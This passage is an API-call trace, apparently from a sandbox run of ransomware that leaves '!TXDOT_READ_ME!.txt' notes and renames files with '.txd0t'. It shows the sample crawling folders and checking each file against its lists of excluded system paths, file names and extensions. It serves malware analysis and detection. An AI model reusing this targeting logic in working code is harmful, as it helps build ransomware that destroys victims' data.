psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.335] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt" [0128.335] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.335] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.335] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.336] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.336] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1025", cAlternateFileName="")) returned 1 [0128.336] StrCmpW (psz1="1025", psz2=".") returned 1 [0128.336] StrCmpW (psz1="1025", psz2="..") returned 1 [0128.336] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.336] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.336] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1025", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\system32\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\system\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\local\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\boot\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\perflogs\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\programdata\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\drivers\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\wsus\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="crypt_detect") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="cryptolocker") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="ransomware") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\WINDOWS") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.336] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\Program Files") returned 0x0 [0128.336] GetProcessHeap () returned 0xe30000 [0128.336] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.336] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0128.336] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\*") returned="C:\\588bce7c90097ed212\\1025\\*" [0128.336] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0128.558] StrCmpW (psz1=".", psz2=".") returned 0 [0128.558] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580764d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.558] StrCmpW (psz1="..", psz2=".") returned 1 [0128.559] StrCmpW (psz1="..", psz2="..") returned 0 [0128.559] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ef8d27, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x57ef8d27, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57f1ef3a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.559] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.559] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.559] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0128.559] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0128.559] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1025\\!TXDOT_READ_ME!.txt" [0128.559] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.559] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.559] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.559] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x57ef8d27, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1f8f, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.559] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.559] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.559] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0128.559] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0128.559] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1025\\eula.rtf.txd0t" [0128.559] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.559] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.559] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x580764d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x123e6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.559] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.559] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.560] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0128.560] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0128.560] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.txd0t" [0128.560] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.560] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.560] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.560] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.560] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.560] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0128.560] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0128.560] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" [0128.560] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.560] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.560] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.560] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.560] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.560] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.560] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0128.560] GetProcessHeap () returned 0xe30000 [0128.560] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.561] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580e8bbd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580e8bbd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1028", cAlternateFileName="")) returned 1 [0128.561] StrCmpW (psz1="1028", psz2=".") returned 1 [0128.561] StrCmpW (psz1="1028", psz2="..") returned 1 [0128.561] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.561] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.561] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1028", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\system32\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\system\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\local\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\boot\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\perflogs\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\programdata\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\drivers\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\wsus\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="crypt_detect") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="cryptolocker") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="ransomware") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\WINDOWS") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.561] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\Program Files") returned 0x0 [0128.561] GetProcessHeap () returned 0xe30000 [0128.561] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.561] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0128.561] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\*") returned="C:\\588bce7c90097ed212\\1028\\*" [0128.561] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580e8bbd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580e8bbd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.562] StrCmpW (psz1=".", psz2=".") returned 0 [0128.562] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x580e8bbd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580e8bbd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.562] StrCmpW (psz1="..", psz2=".") returned 1 [0128.562] StrCmpW (psz1="..", psz2="..") returned 0 [0128.562] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57f1ef3a, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x57f1ef3a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57f45136, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.562] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.562] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.562] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0128.562] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0128.562] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1028\\!TXDOT_READ_ME!.txt" [0128.562] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.562] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.562] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.562] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x57f1ef3a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1aa5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.562] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.563] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.563] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0128.563] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0128.563] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1028\\eula.rtf.txd0t" [0128.563] 